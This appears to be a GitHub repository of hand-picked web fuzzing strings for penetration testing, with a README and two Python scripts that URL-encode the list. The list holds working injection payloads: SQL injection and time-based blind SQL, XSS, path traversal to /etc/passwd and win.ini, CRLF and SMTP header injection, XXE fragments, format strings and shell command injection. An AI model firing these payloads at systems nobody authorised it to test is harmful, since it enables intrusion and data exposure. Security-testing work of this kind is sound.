├── README.md ├── ShortFuzzList-commented.txt ├── ShortFuzzList.txt ├── full-url-encoder.py └── partial-url-encoder.py /README.md: -------------------------------------------------------------------------------- 1 | # Fuzz String Lists 2 | 3 | Hand-picked web application fuzzing strings for initial testing of web application requests. The general use case will occur after one has mapped out a web application and has found some requests with lots of parameters. A quick fuzz of that request using Burp Intruder or wfuzz and this list could either discover a vulnerability or cause a strange response from the server. If a strange response is discovered, then more granular fuzzing/exploiting can be done with strings from https://github.com/danielmiessler/SecLists or https://github.com/minimaxir/big-list-of-naughty-strings. 4 | -------------------------------------------------------------------------------- /ShortFuzzList-commented.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DanMcInerney/FuzzStrings/7d39d3adbc5862704cd81e7b2f147a6c0aa2d240/ShortFuzzList-commented.txt -------------------------------------------------------------------------------- /ShortFuzzList.txt: -------------------------------------------------------------------------------- 1 | !@$%^&*()_+=-[]{`}~\|;':"?/>.<,# 2 | #,<.>/?":';|\~}`{][-=+_)(*&^%$@! 3 | ~ 4 | ! 5 | @ 6 | # 7 | $ 8 | % 9 | ^ 10 | & 11 | * 12 | ( 13 | ) 14 | _ 15 | _ 16 | + 17 | = 18 | { 19 | } 20 | [ 21 | | 22 | \ 23 | ` 24 | , 25 | . 26 | / 27 | ? 
28 | ; 29 | : 30 | ' 31 | '' 32 | " 33 | "" 34 | < 35 | > 36 | -1 37 | 0 38 | 1 39 | null 40 | true 41 | false 42 | %00 43 | %01 44 | %70 45 | %20 46 | %00%00 47 | NaN 48 | SLEEP(30) /*‘ or SLEEP(30) or ‘“ or SLEEP(30) or “*/ 49 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),SLEEP(30)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),​SLEEP(30)))OR"*/ FROM some_table WHERE ex = ample 50 | javascript://'/-->*/alert()/* 51 | javascript://'//" -->*/alert()/* 52 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 53 | '"#||+>; 54 | '-- 55 | '; 56 | "-- 57 | "; 58 | or 9=9 59 | or 9=9-- 60 | or 9=9; 61 | or 9=9-- 62 | or 9=9; 63 | ' or 9=9-- 64 | ' or 9=9; 65 | " or 9=9-- 66 | " or 9=9; 67 | ' or '9'='9 68 | ' or '9'='9' 69 | ' or '9'='9'-- 70 | ' or '9'='9'; 71 | " or "9"="9 72 | " or "9"="9" 73 | " or "9"="9"-- 74 | " or "9"="9"; 75 | ) or ('9'='9 76 | )) or ('9'='9 77 | ) or ("9"="9 78 | )) or ("9"="9 79 | ' or 9=9 or ''=' 80 | " or 9=9 or ""=" 81 | union all select @@version-- 82 | (select @@fuzzstring) 83 | select @@fuzzstring 84 | ' or 9=9 or ''=' 85 | " or 9=9 or ""=" 86 | sleep(10)# 87 | 1 or sleep(10)# 88 | " or sleep(10)# 89 | ' or sleep(10)# 90 | " or sleep(10)=" 91 | ' or sleep(10)=' 92 | 1) or sleep(10)# 93 | ") or sleep(10)=" 94 | ') or sleep(10)=' 95 | 1)) or sleep(10)# 96 | ")) or sleep(10)=" 97 | ')) or sleep(10)=' 98 | ;waitfor delay '0:0:10'-- 99 | );waitfor delay '0:0:10'-- 100 | ';waitfor delay '0:0:10'-- 101 | ";waitfor delay '0:0:10'-- 102 | ');waitfor delay '0:0:10'-- 103 | ");waitfor delay '0:0:10'-- 104 | ));waitfor delay '0:0:10'-- 105 | '));waitfor delay '0:0:10'-- 106 | "));waitfor delay '0:0:10'-- 107 | benchmark(10000000,MD5(1))# 108 | 1 or benchmark(10000000,MD5(1))# 109 | " or 
benchmark(10000000,MD5(1))# 110 | ' or benchmark(10000000,MD5(1))# 111 | 1) or benchmark(10000000,MD5(1))# 112 | ") or benchmark(10000000,MD5(1))# 113 | ') or benchmark(10000000,MD5(1))# 114 | 1)) or benchmark(10000000,MD5(1))# 115 | ")) or benchmark(10000000,MD5(1))# 116 | ')) or benchmark(10000000,MD5(1))# 117 | pg_sleep(10)-- 118 | 1 or pg_sleep(10)-- 119 | " or pg_sleep(10)-- 120 | ' or pg_sleep(10)-- 121 | 1) or pg_sleep(10)-- 122 | ") or pg_sleep(10)-- 123 | ') or pg_sleep(10)-- 124 | 1)) or pg_sleep(10)-- 125 | ")) or pg_sleep(10)-- 126 | ')) or pg_sleep(10)-- 127 | x'"> 128 | x”> 129 | 130 | ../../../../../../../../../../../../../../../etc/passwd 131 | ../../../../../../../../../../../../../../../etc/passwd%00 132 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd 133 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 134 | ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd 135 | ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd 136 | \../\../\../\../\../\../\../\../\../\../\../\../\../\../\../etc/passwd 137 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 138 | ../../../../../../../../../../../../../../../windows/win.ini 139 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini%00 140 | ../../../../../../../../../../../../../../../boot.ini 141 | ../../../../../../../../../../../../../../../boot.ini%00 142 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini 143 | ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//windows//win.ini 144 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p 145 | %0d%0aEvilHeader:%20ThisShouldntExist%0d%0a 146 | %0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EEvil content%3C/html%3E 147 | 
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+pentest@coalfire.com%0d%0aRCPT+TO:+pentest@coalfire.com%0d%0aDATA%0d%0aFrom:+pentest@coalfire.com%0d%0aTo:+pentest@coalfire.com%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a 148 | ]]> 149 | ]>&xxe; 150 | ]>&xxe; 151 | ]>&xxe; 152 | count(/child::node()) 153 | 154 | 155 | &foo; 156 | %foo; 157 | */* 158 |
159 |
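160 | 161 | 162 | %u003c 163 | %u003e 164 | %u0022 165 | \u0022 166 | \u003c 167 | \u003e 168 | eval("while(1);") 169 | {"\x00":0} 170 | {"1":0} 171 | [] 172 | {} 173 | %p%p%p%p 174 | %x%x%x%x 175 | %d%d%d%d 176 | %s%s%s%s 177 | %n%n%n%n 178 | ;echo fuzzstring 179 | && echo fuzzstring 180 | & echo fuzzstring 181 | `echo fuzzstring 182 | ///eff.org 183 | //eff.org 184 | /\eff.org 185 | https://eff.org 186 | œ∑´®†¥¨ˆøπ“‘ 187 | ⅛⅜⅝⅞ 188 | ЁЂЃЄЅІЇЈ 189 | ⁰⁴⁵₀₁₂ 190 | 田中さんにあげて下さい 191 | 사회과학원 어학연구소 192 | (ノಥ益ಥ)ノ ┻━┻ 193 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 194 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 195 | ما, يذكر االإطلاق عل إيو 196 | test‪ 197 | ‫test‫ 198 | � 199 | test 200 | I̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 201 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop 202 |
--------------------------------------------------------------------------------
/full-url-encoder.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Write a fully percent-encoded copy of ShortFuzzList.txt.

Every byte of every entry is emitted as a lowercase ``%xx`` escape, one
entry per output line, into ShortFuzzList-full-URL-encoded.txt.  Entries
that already contain percent-escapes (for example ``%00``) therefore come
out double-encoded.

Runs unchanged on Python 2.7 and Python 3.
"""

SOURCE_LIST = 'ShortFuzzList.txt'
ENCODED_LIST = 'ShortFuzzList-full-URL-encoded.txt'


def encode_entry(raw):
    """Return the bytes in *raw* as a string of ``%xx`` escapes."""
    # bytearray yields integers on both Python 2 and 3, so no ord() is needed.
    return "".join("%{:02x}".format(byte) for byte in bytearray(raw))


def main():
    """Encode SOURCE_LIST line by line into ENCODED_LIST."""
    # Binary mode: the list holds multi-byte and invalid UTF-8 sequences that
    # must be encoded byte for byte rather than decoded first.
    with open(SOURCE_LIST, 'rb') as src, open(ENCODED_LIST, 'w') as dst:
        for raw in src:
            # Drop only the line terminator.  Slicing three characters off the
            # encoded text instead would eat the final byte of a last line
            # that has no trailing newline.
            # NOTE: a list saved with CRLF endings keeps the CR, which then
            # appears as %0d at the end of every entry.
            if raw.endswith(b'\n'):
                raw = raw[:-1]
            # repr() keeps the control and bidirectional characters in the
            # list from being interpreted by the terminal.
            print(repr(raw))
            dst.write(encode_entry(raw) + '\n')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/partial-url-encoder.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Write a URL-quoted copy of ShortFuzzList.txt.

Each entry is passed through ``quote()`` with its default safe set, so
letters, digits, ``_``, ``.``, ``-`` and ``/`` stay literal and everything
else becomes an uppercase ``%XX`` escape.  The result goes, one entry per
line, into ShortFuzzList-partial-URL-encoded.txt.  A literal ``%`` is
itself escaped, so entries such as ``%00`` come out as ``%2500``.

Runs on Python 2.7 and Python 3.  Python 2 escapes ``~`` while Python 3.7+
leaves it literal, so the two outputs can differ in that one character.
"""

try:
    from urllib import quote  # Python 2
except ImportError:
    from urllib.parse import quote  # Python 3

SOURCE_LIST = 'ShortFuzzList.txt'
ENCODED_LIST = 'ShortFuzzList-partial-URL-encoded.txt'


def main():
    """Quote SOURCE_LIST line by line into ENCODED_LIST."""
    # Binary mode: quote() accepts bytes on both interpreters, and the list
    # contains byte sequences that are not valid UTF-8.
    with open(SOURCE_LIST, 'rb') as src, open(ENCODED_LIST, 'w') as dst:
        for raw in src:
            # Remove the newline before quoting.  Trimming the encoded newline
            # afterwards would cut three characters of payload from a last
            # line that has no trailing newline.
            # NOTE: a list saved with CRLF endings keeps the CR, which then
            # appears as %0D at the end of every entry.
            if raw.endswith(b'\n'):
                raw = raw[:-1]
            # repr() keeps the control and bidirectional characters in the
            # list from being interpreted by the terminal.
            print(repr(raw))
            dst.write(quote(raw) + '\n')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------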